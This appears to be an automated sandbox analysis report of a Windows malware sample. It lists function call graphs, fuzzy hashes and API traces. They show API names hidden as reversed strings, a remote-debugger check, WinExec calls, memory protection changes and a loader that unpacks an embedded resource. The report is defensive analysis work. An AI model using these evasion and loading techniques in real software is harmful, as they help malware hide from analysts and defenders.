                                                                                                                                      • Opcode Fuzzy Hash: e3c9dbfeac82c52c2aff80b6893176ea72759ae667997593a4ae06552fefa682
                                                                                                                                      • Instruction Fuzzy Hash: 7A11D6B6654208BFEB90DFACDD51F9A37EDEB0D700F5245A0FA08D7A40D634E9108B24
                                                                                                                                      Function 02BA840E Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02BA8478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressExecHandleModuleProc
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 3450258509-3609268280
                                                                                                                                      • Opcode ID: 0831b7d2ce961eb33aa09256df09c616f96cb9c1716f0c5cfdc36bda5fde112a
                                                                                                                                      • Instruction ID: a3e8af9046413a9c82c67a86b46e275b87b67605d5921221c1f9bedb8f484925
                                                                                                                                      • Opcode Fuzzy Hash: 0831b7d2ce961eb33aa09256df09c616f96cb9c1716f0c5cfdc36bda5fde112a
                                                                                                                                      • Instruction Fuzzy Hash: 2A018175A58204BFEB10EFA8DC61F5E77EDE749700F5188A1F604D7A50DA74AD108A24
                                                                                                                                      Function 02BA8410 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 45processCOMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • WinExec.KERNEL32(?,?), ref: 02BA8478
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressExecHandleModuleProc
                                                                                                                                      • String ID: Kernel32$WinExec
                                                                                                                                      • API String ID: 3450258509-3609268280
                                                                                                                                      • Opcode ID: ec84857237c24f7c940e8813bc44d00f7f47d01ebb632b8f802dcd72c4600801
                                                                                                                                      • Instruction ID: 7fd0dd7258a7b95f49e6a09d8af6470138c7bae2cb08855de005dd1dd2407768
                                                                                                                                      • Opcode Fuzzy Hash: ec84857237c24f7c940e8813bc44d00f7f47d01ebb632b8f802dcd72c4600801
                                                                                                                                      • Instruction Fuzzy Hash: EBF0A475A58304FFEB10EFA8DC61F5E77EDE749700F5188A1F604D7A50DA74A9108B24
                                                                                                                                      Function 02BAEBF0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 28COMMON
                                                                                                                                      Download Yara Rule

                                                                                                                                      Control-flow Graph

                                                                                                                                      • Executed
                                                                                                                                      • Not Executed
                                                                                                                                      control_flow_graph 8664 2baebf0-2baec0a call 2b96638 8667 2baec0c-2baec1e call 2b96640 8664->8667 8668 2baec36-2baec3e 8664->8668 8667->8668 8671 2baec20-2baec30 CheckRemoteDebuggerPresent 8667->8671 8671->8668 8672 2baec32 8671->8672 8672->8668
                                                                                                                                      APIs
                                                                                                                                      • CheckRemoteDebuggerPresent.KERNEL32(FFFFFFFF,?,00000000,CheckRemoteDebuggerPresent,KernelBase), ref: 02BAEC29
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CheckDebuggerPresentRemote
                                                                                                                                      • String ID: CheckRemoteDebuggerPresent$KernelBase
                                                                                                                                      • API String ID: 3662101638-539270669
                                                                                                                                      • Opcode ID: 6032f479602095851f60b3527a69ae2b5770bdb483484d9e5297e24418dccdff
                                                                                                                                      • Instruction ID: 7e1d2b94ef4a32129e301bb43474eff19c1999792d1f263a2cdbf76f5474c29d
                                                                                                                                      • Opcode Fuzzy Hash: 6032f479602095851f60b3527a69ae2b5770bdb483484d9e5297e24418dccdff
                                                                                                                                      • Instruction Fuzzy Hash: 58F0A77090C24CBBDB21A7A888997DCFBA99B05328F6403F4E424611D1F7754644C661

                                                                                                                                      Non-executed Functions

                                                                                                                                      Function 02BA818C Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA8020: GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • FlushInstructionCache.KERNEL32(?,?,?,00000000,Kernel32,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,02BA8216), ref: 02BA81F8
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressCacheFlushHandleInstructionModuleProc
                                                                                                                                      • String ID: FlushInstructionCache$Kernel32
                                                                                                                                      • API String ID: 2392256011-184458249
                                                                                                                                      • Opcode ID: 457c7d5d4c4f506ebd4baac4f56f9f79ae0f2a6e580b36c9ff5bf07209865db2
                                                                                                                                      • Instruction ID: c3596a6561b4805bb2871c65e517005a8993c2b8db04f4190c507326b18ccb55
                                                                                                                                      • Opcode Fuzzy Hash: 457c7d5d4c4f506ebd4baac4f56f9f79ae0f2a6e580b36c9ff5bf07209865db2
                                                                                                                                      • Instruction Fuzzy Hash: 8C01A275654304BFEB11EFA8DC61F5E77ADE709700F5148A1F604E3A00D630AD108B24
                                                                                                                                      Function 02BA80C8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc
                                                                                                                                      • String ID: Kernel32$sserddAcorPteG
                                                                                                                                      • API String ID: 190572456-1372893251
                                                                                                                                      • Opcode ID: 611a9b2bbcda9bbf84db0899ff7f2209c1ed046507ddb5918ba0c4cb7c54a095
                                                                                                                                      • Instruction ID: 84ceea3b3ce00dbd69c66a21a42847dfed1dfef8a24c59915d6c856f6b44645a
                                                                                                                                      • Opcode Fuzzy Hash: 611a9b2bbcda9bbf84db0899ff7f2209c1ed046507ddb5918ba0c4cb7c54a095
                                                                                                                                      • Instruction Fuzzy Hash: 08014F35A54304BFEF00EFA8D851E9E77BEEB4D750F5188B5F60497A10DA34A911CA24
                                                                                                                                      Function 02BA8020 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 36COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 02BA80C8: GetProcAddress.KERNEL32(?,?), ref: 02BA812D
                                                                                                                                      • GetModuleHandleA.KERNELBASE(?), ref: 02BA8072
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000015.00000002.2615248240.0000000002B91000.00000020.00001000.00020000.00000000.sdmp, Offset: 02B91000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_21_2_2b91000_Oupzhkpr.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressHandleModuleProc
                                                                                                                                      • String ID: AeldnaHeludoMteG$KernelBASE
                                                                                                                                      • API String ID: 1646373207-1952140341
                                                                                                                                      • Opcode ID: 77ff27abc9d49c2fbf8efdc8c80b7c95e66b0322aa5e5d0861f6a568da7c70fd
                                                                                                                                      • Instruction ID: f8fa5cca86f676f9b03afe5ba52f2039b8ae9ed91ef6bd4846405163ab7dda16
                                                                                                                                      • Opcode Fuzzy Hash: 77ff27abc9d49c2fbf8efdc8c80b7c95e66b0322aa5e5d0861f6a568da7c70fd
                                                                                                                                      • Instruction Fuzzy Hash: AAF06D71658304BFEB50EFA8D822D5E7BAEEB49740B9149E1F60493A10DA30AD148A64

                                                                                                                                      Execution Graph

                                                                                                                                      Execution Coverage:5.4%
                                                                                                                                      Dynamic/Decrypted Code Coverage:4.2%
                                                                                                                                      Signature Coverage:0%
                                                                                                                                      Total number of Nodes:1291
                                                                                                                                      Total number of Limit Nodes:53
                                                                                                                                      execution_graph 17976 351855c8 17977 3518560c 17976->17977 17978 35185616 EnumThreadWindows 17976->17978 17977->17978 17979 35185648 17978->17979 17980 351838e8 DuplicateHandle 17981 3518397e 17980->17981 17982 31d70bc4 17983 31d70bcd 17982->17983 17987 35182060 17983->17987 17993 35182056 17983->17993 17984 31d70be7 17988 351820c3 17987->17988 17989 351821d7 GetActiveWindow 17988->17989 17990 35182205 17988->17990 17992 351822a5 17988->17992 17989->17990 17990->17992 17999 35181f9c 17990->17999 17992->17984 17994 351820c3 17993->17994 17995 351821d7 GetActiveWindow 17994->17995 17996 35182205 17994->17996 17998 351822a5 17994->17998 17995->17996 17997 35181f9c MessageBoxW 17996->17997 17996->17998 17997->17998 17998->17984 18000 35185958 MessageBoxW 17999->18000 18002 351859e4 18000->18002 18002->17992 17946 31d70890 17947 31d708b1 17946->17947 17948 31d7097a 17947->17948 17951 31d73bf3 17947->17951 17954 31d71838 17947->17954 17957 31d79080 17951->17957 17956 31d79080 VirtualProtect 17954->17956 17955 31d71851 17956->17955 17958 31d79093 17957->17958 17961 31d79130 17958->17961 17962 31d79178 VirtualProtect 17961->17962 17964 31d73c12 17962->17964 17965 35183eff 17968 35183590 17965->17968 17969 3518359b 17968->17969 17972 351854c8 17969->17972 17970 35183f0c 17973 35185527 GetCurrentThreadId 17972->17973 17975 3518556d 17973->17975 17975->17970 18003 351836a0 18004 351836e6 GetCurrentProcess 18003->18004 18006 35183738 GetCurrentThread 18004->18006 18009 35183731 18004->18009 18007 3518376e 18006->18007 18008 35183775 GetCurrentProcess 18006->18008 18007->18008 18012 351837ab 18008->18012 18009->18006 18010 351837d3 GetCurrentThreadId 18011 35183804 18010->18011 18012->18010 18013 40cbdd 18014 40cbe9 __commit 18013->18014 18048 40d534 HeapCreate 18014->18048 18017 40cc46 18050 41087e GetModuleHandleW 18017->18050 18021 40cc57 __RTC_Initialize 18084 411a15 18021->18084 18022 40cbb4 _fast_error_exit 63 API calls 18022->18021 18024 40cc66 18025 40cc72 GetCommandLineA 18024->18025 18224 40e79a 18024->18224 18099 412892 18025->18099 18032 40cc97 18138 41255f 18032->18138 18033 40e79a __amsg_exit 63 API calls 18033->18032 18036 40cca8 18153 40e859 18036->18153 18038 40e79a __amsg_exit 63 API calls 18038->18036 18039 40ccb0 18040 40ccbb 18039->18040 18041 40e79a __amsg_exit 63 API calls 18039->18041 18159 4019f0 OleInitialize 18040->18159 18041->18040 18043 40ccd8 18044 40ccea 18043->18044 18213 40ea0a 18043->18213 18231 40ea36 18044->18231 18047 40ccef __commit 18049 40cc3a 18048->18049 18049->18017 18216 40cbb4 18049->18216 18051 410892 18050->18051 18052 410899 18050->18052 18234 40e76a 18051->18234 18054 410a01 18052->18054 18055 4108a3 GetProcAddress GetProcAddress GetProcAddress GetProcAddress 18052->18055 18293 410598 18054->18293 18058 4108ec TlsAlloc 18055->18058 18060 41093a TlsSetValue 18058->18060 18061 40cc4c 18058->18061 18060->18061 18062 41094b 18060->18062 18061->18021 18061->18022 18238 40ea54 18062->18238 18067 41046e __encode_pointer 6 API calls 18068 41096b 18067->18068 18069 41046e __encode_pointer 6 API calls 18068->18069 18070 41097b 18069->18070 18071 41046e __encode_pointer 6 API calls 18070->18071 18072 41098b 18071->18072 18255 40d564 18072->18255 18079 4104e9 __decode_pointer 6 API calls 18080 4109df 18079->18080 18080->18054 18081 4109e6 18080->18081 18275 4105d5 18081->18275 18083 4109ee GetCurrentThreadId 18083->18061 18599 40e1d8 18084->18599 18086 411a21 GetStartupInfoA 18087 411cba __calloc_crt 63 API calls 18086->18087 18093 411a42 18087->18093 18088 411c60 __commit 18088->18024 18089 411bdd GetStdHandle 18098 411ba7 18089->18098 18090 411c42 SetHandleCount 18090->18088 18091 411cba __calloc_crt 63 API calls 18091->18093 18092 411bef GetFileType 18092->18098 18093->18088 18093->18091 18095 411b2a 18093->18095 18093->18098 18094 411b53 GetFileType 18094->18095 18095->18088 18095->18094 18097 41389c __ioinit InitializeCriticalSectionAndSpinCount 18095->18097 18095->18098 18096 41389c __ioinit InitializeCriticalSectionAndSpinCount 18096->18098 18097->18095 18098->18088 18098->18089 18098->18090 18098->18092 18098->18096 18100 4128b0 GetEnvironmentStringsW 18099->18100 18107 4128cf 18099->18107 18101 4128c4 GetLastError 18100->18101 18102 4128b8 18100->18102 18101->18107 18104 4128eb GetEnvironmentStringsW 18102->18104 18105 4128fa WideCharToMultiByte 18102->18105 18103 412968 18106 412971 GetEnvironmentStrings 18103->18106 18108 40cc82 18103->18108 18104->18105 18104->18108 18112 41295d FreeEnvironmentStringsW 18105->18112 18113 41292e 18105->18113 18106->18108 18109 412981 18106->18109 18107->18102 18107->18103 18125 4127d7 18108->18125 18114 411c75 __malloc_crt 63 API calls 18109->18114 18112->18108 18115 411c75 __malloc_crt 63 API calls 18113->18115 18116 41299b 18114->18116 18117 412934 18115->18117 18118 4129a2 FreeEnvironmentStringsA 18116->18118 18119 4129ae ___crtGetEnvironmentStringsA 18116->18119 18117->18112 18120 41293c WideCharToMultiByte 18117->18120 18118->18108 18123 4129b8 FreeEnvironmentStringsA 18119->18123 18121 412956 18120->18121 18122 41294e 18120->18122 18121->18112 18124 40b6b5 type_info::_Type_info_dtor 63 API calls 18122->18124 18123->18108 18124->18121 18126 4127f1 GetModuleFileNameA 18125->18126 18127 4127ec 18125->18127 18129 412818 18126->18129 18606 41446b 18127->18606 18600 41263d 18129->18600 18132 40cc8c 18132->18032 18132->18033 18133 412854 18134 411c75 __malloc_crt 63 API calls 18133->18134 18135 41285a 18134->18135 18135->18132 18136 41263d _parse_cmdline 73 API calls 18135->18136 18137 412874 18136->18137 18137->18132 18139 412568 18138->18139 18142 41256d _strlen 18138->18142 18140 41446b ___initmbctable 107 API calls 18139->18140 18140->18142 18141 411cba __calloc_crt 63 API calls 18148 4125a2 _strlen 18141->18148 18142->18141 18145 40cc9d 18142->18145 18143 412600 18144 40b6b5 type_info::_Type_info_dtor 63 API calls 18143->18144 18144->18145 18145->18036 18145->18038 18146 411cba __calloc_crt 63 API calls 18146->18148 18147 412626 18149 40b6b5 type_info::_Type_info_dtor 63 API calls 18147->18149 18148->18143 18148->18145 18148->18146 18148->18147 18150 40ef42 _strcpy_s 63 API calls 18148->18150 18151 4125e7 18148->18151 18149->18145 18150->18148 18151->18148 18152 40e61c __invoke_watson 10 API calls 18151->18152 18152->18151 18154 40e867 __IsNonwritableInCurrentImage 18153->18154 19017 413586 18154->19017 18156 40e885 __initterm_e 18158 40e8a4 __IsNonwritableInCurrentImage __initterm 18156->18158 19021 40d2bd 18156->19021 18158->18039 18160 401ab9 18159->18160 19121 40b99e 18160->19121 18162 401abf 18163 401acd GetCurrentProcessId CreateToolhelp32Snapshot Module32First 18162->18163 18192 402467 18162->18192 18164 401dc3 CloseHandle GetModuleHandleA 18163->18164 18172 401c55 18163->18172 19134 401650 18164->19134 18166 401e8b FindResourceA LoadResource LockResource SizeofResource 18167 40b84d _malloc 63 API calls 18166->18167 18168 401ebf 18167->18168 19136 40af66 18168->19136 18170 401c9c CloseHandle 18170->18043 18171 401ecb _memset 18173 401efc SizeofResource 18171->18173 18172->18170 18176 401cf9 Module32Next 18172->18176 18174 401f1c 18173->18174 18175 401f5f 18173->18175 18174->18175 19174 401560 18174->19174 18178 401f92 _memset 18175->18178 18179 401560 __VEC_memcpy 18175->18179 18176->18164 18185 401d0f 18176->18185 18180 401fa2 FreeResource 18178->18180 18179->18178 18181 40b84d _malloc 63 API calls 18180->18181 18182 401fbb SizeofResource 18181->18182 18183 401fe5 _memset 18182->18183 18184 4020aa LoadLibraryA 18183->18184 18186 401650 18184->18186 18185->18170 18188 401dad Module32Next 18185->18188 18187 40216c GetProcAddress 18186->18187 18189 4021aa 18187->18189 18187->18192 18188->18164 18188->18185 18189->18192 19148 4018f0 18189->19148 18191 40b6b5 type_info::_Type_info_dtor 63 API calls 18191->18192 18192->18043 18193 4021f1 18212 40243f 18193->18212 19160 401870 18193->19160 18195 402269 VariantInit 18196 401870 76 API calls 18195->18196 18197 40228b VariantInit 18196->18197 18198 4022a7 18197->18198 18199 4022d9 SafeArrayCreate SafeArrayAccessData 18198->18199 19165 40b350 18199->19165 18202 40232c 18203 402354 SafeArrayDestroy 18202->18203 18204 40235b 18202->18204 18203->18204 18205 402392 SafeArrayCreateVector 18204->18205 18206 4023a4 18205->18206 18207 4023bc VariantClear VariantClear 18206->18207 19167 4019a0 18207->19167 18210 40242e 18211 4019a0 66 API calls 18210->18211 18211->18212 18212->18191 18212->18192 19439 40e8de 18213->19439 18215 40ea1b 18215->18044 18217 40cbc2 18216->18217 18218 40cbc7 18216->18218 18219 40ec4d __FF_MSGBANNER 63 API calls 18217->18219 18220 40eaa2 __NMSG_WRITE 63 API calls 18218->18220 18219->18218 18221 40cbcf 18220->18221 18222 40e7ee _malloc 4 API calls 18221->18222 18223 40cbd9 18222->18223 18223->18017 18225 40ec4d __FF_MSGBANNER 63 API calls 18224->18225 18226 40e7a4 18225->18226 18227 40eaa2 __NMSG_WRITE 63 API calls 18226->18227 18228 40e7ac 18227->18228 18229 4104e9 __decode_pointer 6 API calls 18228->18229 18230 40cc71 18229->18230 18230->18025 18232 40e8de _doexit 63 API calls 18231->18232 18233 40ea41 18232->18233 18233->18047 18235 40e775 Sleep GetModuleHandleW 18234->18235 18236 40e793 18235->18236 18237 40e797 18235->18237 18236->18235 18236->18237 18237->18052 18299 4104e0 18238->18299 18240 40ea5c __init_pointers __initp_misc_winsig 18302 41393d 18240->18302 18243 41046e __encode_pointer 6 API calls 18244 40ea98 18243->18244 18245 41046e TlsGetValue 18244->18245 18246 4104a7 GetModuleHandleW 18245->18246 18247 410486 18245->18247 18248 4104c2 GetProcAddress 18246->18248 18249 4104b7 18246->18249 18247->18246 18250 410490 TlsGetValue 18247->18250 18252 41049f 18248->18252 18251 40e76a __crt_waiting_on_module_handle 2 API calls 18249->18251 18254 41049b 18250->18254 18253 4104bd 18251->18253 18252->18067 18253->18248 18253->18252 18254->18246 18254->18252 18256 40d56f 18255->18256 18258 40d59d 18256->18258 18305 41389c 18256->18305 18258->18054 18259 4104e9 TlsGetValue 18258->18259 18260 410501 18259->18260 18261 410522 GetModuleHandleW 18259->18261 18260->18261 18262 41050b TlsGetValue 18260->18262 18263 410532 18261->18263 18264 41053d GetProcAddress 18261->18264 18267 410516 18262->18267 18265 40e76a __crt_waiting_on_module_handle 2 API calls 18263->18265 18266 41051a 18264->18266 18268 410538 18265->18268 18266->18054 18269 411cba 18266->18269 18267->18261 18267->18266 18268->18264 18268->18266 18272 411cc3 18269->18272 18271 4109c5 18271->18054 18271->18079 18272->18271 18273 411ce1 Sleep 18272->18273 18310 40e231 18272->18310 18274 411cf6 18273->18274 18274->18271 18274->18272 18578 40e1d8 18275->18578 18277 4105e1 GetModuleHandleW 18278 4105f1 18277->18278 18279 4105f7 18277->18279 18280 40e76a __crt_waiting_on_module_handle 2 API calls 18278->18280 18281 410633 18279->18281 18282 41060f GetProcAddress GetProcAddress 18279->18282 18280->18279 18283 40d6e0 __lock 59 API calls 18281->18283 18282->18281 18284 410652 InterlockedIncrement 18283->18284 18579 4106aa 18284->18579 18287 40d6e0 __lock 59 API calls 18288 410673 18287->18288 18582 4145d2 InterlockedIncrement 18288->18582 18290 410691 18594 4106b3 18290->18594 18292 41069e __commit 18292->18083 18294 4105a2 18293->18294 18298 4105ae 18293->18298 18297 4104e9 __decode_pointer 6 API calls 18294->18297 18295 4105d0 18295->18295 18296 4105c2 TlsFree 18296->18295 18297->18298 18298->18295 18298->18296 18300 41046e __encode_pointer 6 API calls 18299->18300 18301 4104e7 18300->18301 18301->18240 18303 41046e __encode_pointer 6 API calls 18302->18303 18304 40ea8e 18303->18304 18304->18243 18309 40e1d8 18305->18309 18307 4138a8 InitializeCriticalSectionAndSpinCount 18308 4138ec __commit 18307->18308 18308->18256 18309->18307 18311 40e23d __commit 18310->18311 18312 40e255 18311->18312 18322 40e274 _memset 18311->18322 18323 40bfc1 18312->18323 18315 40e2e6 HeapAlloc 18315->18322 18319 40e26a __commit 18319->18272 18322->18315 18322->18319 18329 40d6e0 18322->18329 18336 40def2 18322->18336 18342 40e32d 18322->18342 18345 40d2e3 18322->18345 18348 4106bc GetLastError 18323->18348 18325 40bfc6 18326 40e744 18325->18326 18327 4104e9 __decode_pointer 6 API calls 18326->18327 18328 40e754 __invoke_watson 18327->18328 18330 40d6f5 18329->18330 18331 40d708 EnterCriticalSection 18329->18331 18373 40d61d 18330->18373 18331->18322 18333 40d6fb 18333->18331 18334 40e79a __amsg_exit 62 API calls 18333->18334 18335 40d707 18334->18335 18335->18331 18337 40df20 18336->18337 18338 40dfb9 18337->18338 18341 40dfc2 18337->18341 18566 40da59 18337->18566 18338->18341 18573 40db09 18338->18573 18341->18322 18577 40d606 LeaveCriticalSection 18342->18577 18344 40e334 18344->18322 18346 4104e9 __decode_pointer 6 API calls 18345->18346 18347 40d2f3 18346->18347 18347->18322 18362 410564 TlsGetValue 18348->18362 18351 410729 SetLastError 18351->18325 18352 411cba __calloc_crt 60 API calls 18353 4106e7 18352->18353 18353->18351 18354 4104e9 __decode_pointer 6 API calls 18353->18354 18355 410701 18354->18355 18356 410720 18355->18356 18357 410708 18355->18357 18367 40b6b5 18356->18367 18358 4105d5 __initptd 60 API calls 18357->18358 18360 410710 GetCurrentThreadId 18358->18360 18360->18351 18361 410726 18361->18351 18363 410594 18362->18363 18364 410579 18362->18364 18363->18351 18363->18352 18365 4104e9 __decode_pointer 6 API calls 18364->18365 18366 410584 TlsSetValue 18365->18366 18366->18363 18368 40b6c1 __commit 18367->18368 18369 40b73d __commit 18368->18369 18370 40b714 HeapFree 18368->18370 18369->18361 18370->18369 18371 40b727 18370->18371 18372 40bfc1 __commit 62 API calls 18371->18372 18372->18369 18374 40d629 __commit 18373->18374 18375 40d64f 18374->18375 18399 40ec4d 18374->18399 18383 40d65f __commit 18375->18383 18445 411c75 18375->18445 18381 40d680 18386 40d6e0 __lock 63 API calls 18381->18386 18382 40d671 18385 40bfc1 __commit 63 API calls 18382->18385 18383->18333 18385->18383 18388 40d687 18386->18388 18389 40d6bb 18388->18389 18390 40d68f 18388->18390 18391 40b6b5 type_info::_Type_info_dtor 63 API calls 18389->18391 18392 41389c __ioinit InitializeCriticalSectionAndSpinCount 18390->18392 18398 40d6ac 18391->18398 18393 40d69a 18392->18393 18395 40b6b5 type_info::_Type_info_dtor 63 API calls 18393->18395 18393->18398 18396 40d6a6 18395->18396 18397 40bfc1 __commit 63 API calls 18396->18397 18397->18398 18450 40d6d7 18398->18450 18453 413d5b 18399->18453 18402 40ec61 18404 40eaa2 __NMSG_WRITE 63 API calls 18402->18404 18406 40d63e 18402->18406 18403 413d5b __set_error_mode 63 API calls 18403->18402 18405 40ec79 18404->18405 18407 40eaa2 __NMSG_WRITE 63 API calls 18405->18407 18408 40eaa2 18406->18408 18407->18406 18409 40eab6 18408->18409 18410 413d5b __set_error_mode 60 API calls 18409->18410 18441 40d645 18409->18441 18411 40ead8 18410->18411 18412 40ec16 GetStdHandle 18411->18412 18414 413d5b __set_error_mode 60 API calls 18411->18414 18413 40ec24 _strlen 18412->18413 18412->18441 18417 40ec3d WriteFile 18413->18417 18413->18441 18415 40eae9 18414->18415 18415->18412 18416 40eafb 18415->18416 18416->18441 18459 40ef42 18416->18459 18417->18441 18420 40eb31 GetModuleFileNameA 18421 40eb4f 18420->18421 18426 40eb72 _strlen 18420->18426 18424 40ef42 _strcpy_s 60 API calls 18421->18424 18425 40eb5f 18424->18425 18425->18426 18427 40e61c __invoke_watson 10 API calls 18425->18427 18437 40ebb5 18426->18437 18475 411da6 18426->18475 18427->18426 18432 40e61c __invoke_watson 10 API calls 18435 40ebd9 18432->18435 18433 413ce7 _strcat_s 60 API calls 18436 40ebed 18433->18436 18434 40e61c __invoke_watson 10 API calls 18434->18437 18435->18433 18438 40ebfe 18436->18438 18440 40e61c __invoke_watson 10 API calls 18436->18440 18484 413ce7 18437->18484 18493 413b7e 18438->18493 18440->18438 18442 40e7ee 18441->18442 18531 40e7c3 GetModuleHandleW 18442->18531 18448 411c7e 18445->18448 18447 40d66a 18447->18381 18447->18382 18448->18447 18449 411c95 Sleep 18448->18449 18535 40b84d 18448->18535 18449->18448 18565 40d606 LeaveCriticalSection 18450->18565 18452 40d6de 18452->18383 18455 413d6a 18453->18455 18454 40ec54 18454->18402 18454->18403 18455->18454 18456 40bfc1 __commit 63 API calls 18455->18456 18457 413d8d 18456->18457 18458 40e744 __commit 6 API calls 18457->18458 18458->18454 18460 40ef53 18459->18460 18463 40ef5a 18459->18463 18460->18463 18466 40ef80 18460->18466 18461 40bfc1 __commit 63 API calls 18462 40ef5f 18461->18462 18464 40e744 __commit 6 API calls 18462->18464 18463->18461 18465 40eb1d 18464->18465 18465->18420 18468 40e61c 18465->18468 18466->18465 18467 40bfc1 __commit 63 API calls 18466->18467 18467->18462 18520 40ba30 18468->18520 18470 40e649 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 18471 40e725 GetCurrentProcess TerminateProcess 18470->18471 18472 40e719 __invoke_watson 18470->18472 18522 40ce09 18471->18522 18472->18471 18474 40e742 18474->18420 18480 411db8 18475->18480 18476 411dbc 18477 40bfc1 __commit 63 API calls 18476->18477 18478 40eba2 18476->18478 18479 411dd8 18477->18479 18478->18434 18478->18437 18481 40e744 __commit 6 API calls 18479->18481 18480->18476 18480->18478 18482 411e02 18480->18482 18481->18478 18482->18478 18483 40bfc1 __commit 63 API calls 18482->18483 18483->18479 18485 413cff 18484->18485 18488 413cf8 18484->18488 18486 40bfc1 __commit 63 API calls 18485->18486 18487 413d04 18486->18487 18489 40e744 __commit 6 API calls 18487->18489 18488->18485 18491 413d33 18488->18491 18490 40ebc8 18489->18490 18490->18432 18490->18435 18491->18490 18492 40bfc1 __commit 63 API calls 18491->18492 18492->18487 18494 4104e0 _doexit 6 API calls 18493->18494 18495 413b8e 18494->18495 18496 413ba1 LoadLibraryA 18495->18496 18499 413c29 18495->18499 18497 413ccb 18496->18497 18498 413bb6 GetProcAddress 18496->18498 18497->18441 18498->18497 18500 413bcc 18498->18500 18503 4104e9 __decode_pointer 6 API calls 18499->18503 18519 413c53 18499->18519 18504 41046e __encode_pointer 6 API calls 18500->18504 18501 4104e9 __decode_pointer 6 API calls 18501->18497 18502 4104e9 __decode_pointer 6 API calls 18511 413c96 18502->18511 18505 413c46 18503->18505 18506 413bd2 GetProcAddress 18504->18506 18508 4104e9 __decode_pointer 6 API calls 18505->18508 18507 41046e __encode_pointer 6 API calls 18506->18507 18509 413be7 GetProcAddress 18507->18509 18508->18519 18510 41046e __encode_pointer 6 API calls 18509->18510 18512 413bfc GetProcAddress 18510->18512 18514 4104e9 __decode_pointer 6 API calls 18511->18514 18516 413c7e 18511->18516 18513 41046e __encode_pointer 6 API calls 18512->18513 18515 413c11 18513->18515 18514->18516 18515->18499 18517 413c1b GetProcAddress 18515->18517 18516->18501 18518 41046e __encode_pointer 6 API calls 18517->18518 18518->18499 18519->18502 18519->18516 18521 40ba3c __VEC_memzero 18520->18521 18521->18470 18523 40ce11 18522->18523 18524 40ce13 IsDebuggerPresent 18522->18524 18523->18474 18530 4138fc 18524->18530 18527 413706 SetUnhandledExceptionFilter UnhandledExceptionFilter 18528 413723 __invoke_watson 18527->18528 18529 41372b GetCurrentProcess TerminateProcess 18527->18529 18528->18529 18529->18474 18530->18527 18532 40e7d7 GetProcAddress 18531->18532 18533 40e7ec ExitProcess 18531->18533 18532->18533 18534 40e7e7 CorExitProcess 18532->18534 18534->18533 18536 40b900 18535->18536 18537 40b85f 18535->18537 18538 40d2e3 _malloc 6 API calls 18536->18538 18544 40b8bc RtlAllocateHeap 18537->18544 18546 40b870 18537->18546 